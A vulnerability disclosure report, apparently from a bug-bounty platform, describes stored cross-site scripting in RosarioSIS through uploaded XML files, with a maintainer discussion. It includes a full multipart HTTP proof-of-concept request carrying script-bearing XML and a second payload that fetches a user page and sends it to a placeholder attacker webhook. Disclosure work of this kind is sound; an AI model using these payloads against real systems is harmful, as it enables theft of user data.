Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis
Reported on
Apr 23rd 2022
Description
When user upload file with XML extension in white-list, server will stored XML file at assets/PortalNotesFiles/, so we can direct access and execute javascript code.
Proof of Concept
POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"
<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"
<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
<info>
<name>
<value>123</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"
-----------------------------3345002182489293764621537208--
PoC images
Impact
This vulnerability can be arbitrarily executed javascript code, steal user'cookie, etc...
Occurrences
@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍
Let me know if you have any further questions.
Hello @nhienit2010
Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.
Oh, cookie is set to HttpOnly so it cannot be retrieved.
Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.
Could you please explain how this could leak user session or other info related to RosarioSIS?
Hello @maintainer,
Because XML file upload in your website, so with same origin policy, so javascript code in the malicous XML allow fetch other user information and send to attacker's host, sometime this vulnerability allow attacker perform HTTP request in victim browser.
Sample payload
<html>
<head></head>
<body>
<info>
<name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
Image PoC
